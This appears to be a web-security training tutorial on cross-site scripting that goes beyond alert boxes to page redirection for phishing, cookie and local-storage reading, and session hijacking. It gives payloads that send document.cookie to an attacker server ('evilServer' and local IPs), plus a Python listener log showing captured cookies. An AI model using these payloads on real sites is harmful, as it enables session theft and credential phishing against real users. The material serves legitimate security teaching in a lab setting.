Common XSS 'injections'
So, you have found XSS and made an 'alert()' box pop up. Congratulations. What can we do next?
In this article we will look at some of the common XSS Based attacks
- Window Relocation
- Scraping User Information.
Info
For the examples, I have linked scripts directly to the
`onClick
method of the buttons (otherwise they would trigger automatically)
<button onclick="PAYLOAD">
Window Relocation
For a Phishing style attack we can redirect the current page to elsewhere (for example, a page that looks much like the login page). This may enable us to seize user credentials.
This would use the payload:
<script>window.location="http://127.0.0.1:8000/</script>
To redirect the user to another page that is under our control.
A common use of this is to create an evil version of the sites login page, to harvest user credentials before redirecting back to the intended content.
You can see an example of this by clicking the button below
Manipulating Browser Behaviour
As the Javascript has access to almost anything in the browsers current session, It is also possible to start grabbing data from, or manipulating the behaviour of the browser itself.
For example we can use the following to show the users current set of cookies
<script>alert(document.cookie)</script>
Or use a payload like this to grab some elements of HTML local storage using
<script>alert(localStorage.key(0) + " " + localStorage.getItem(localStorage.key(0)))</script>
Redirected Session Jacking
Putting these elememnts (redirection, and leaking browser information) together gives us another payload.
Rather than use an "alert()" as a payload. We can use XSS to grab another user's session details, then redirect to a target page that gathers the details.
This relies on us using the javascript to make a request to another site (one that we own) and appending the session cookie.
Our basic POC (Proof Of Concept Exploit) would make use of the following:
<script>window.location="http://evilServer/?cookie="+document.cookie</script>
In this case we also need a server available to listen for the connection. For testing I like to use a locally hosted server, for example using the one built in to python
#For Python 2
python -m SimpleHTTPServer
#For Python 3
python -m http.server
This means our payload becomes
<script>window.location="http://127.0.0.1:8000/evil.php?cookie="+document.cookie</script>
Note
Remember to use the port your server is listening on.
kali@kali:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [01/Nov/2020 16:08:42] code 404, message File not found
127.0.0.1 - - [01/Nov/2020 16:08:42] "GET /cookie.php?_ga=GA1.1.1899681705.1601546157;%20_hjid=304c63fa-2fd3-4940-9803-d380302c7b07 HTTP/1.1" 404 -
127.0.0.1 - - [01/Nov/2020 16:08:42] code 404, message File not found
127.0.0.1 - - [01/Nov/2020 16:08:42] "GET /favicon.ico HTTP/1.1" 404 -
We can pick out the PHPSESSID cookie, and hijack someone else's session by changing the cookie settings in our browser.
More Subtle session jacking
While a redirect gets us the information we want, having your victims browser hang, or give us a 404 is not very subtle.
Instead we could take a couple of alternative approaches:
- Have a web server show an "error" page. When the user hits the back button (or if we are really cunning hits the link we supply from the 'referer' part of the request) they go back to the main page, hopefully oblivious.
- Get the JS to request the page as part of another object (ie an image). This will then be rendered invisibly (or at worst as an error in the console) on the original page.
One approach to this is to use an image (or similar) as the payload
new Image().src="http://192.168.3.1:8000/evil.php?output="+document.cookie;
our listener then will then pick up the cookie, and we can again steal
their session.
You can try this out by starting a python webserver, and clicking the button below
Important
Check my script, to be sure the address is local. Always a good idea to check the source when someone offers to show you a "cool hacking trick"
Task
In the Expliot Trainer Try the Reflected XSS Examples. See if you can send using XSS.
Alternatives to script tags
There are several options rather than using <script>
tags. These will
use the similar payloads to the scripting version. Useful ones include.
What | Payload |
---|---|
onload (happens when the page loads) | \<body onload=(alert();) |
Mouse events | \<tag onmouseover=alert()...\</tag> |
Errors | \<img src=\"url that does not exist\", onerror=alert()> |
Task
Try getting an XSS payload to fire. See if you can grab a session token in using the web trainer Also Try some of the more interesting XSS scripts below.
Further reading
For an Excellent (and somewhat scary) Resource on Payloads see
For information on XSS in other templating languages (Not just PHP)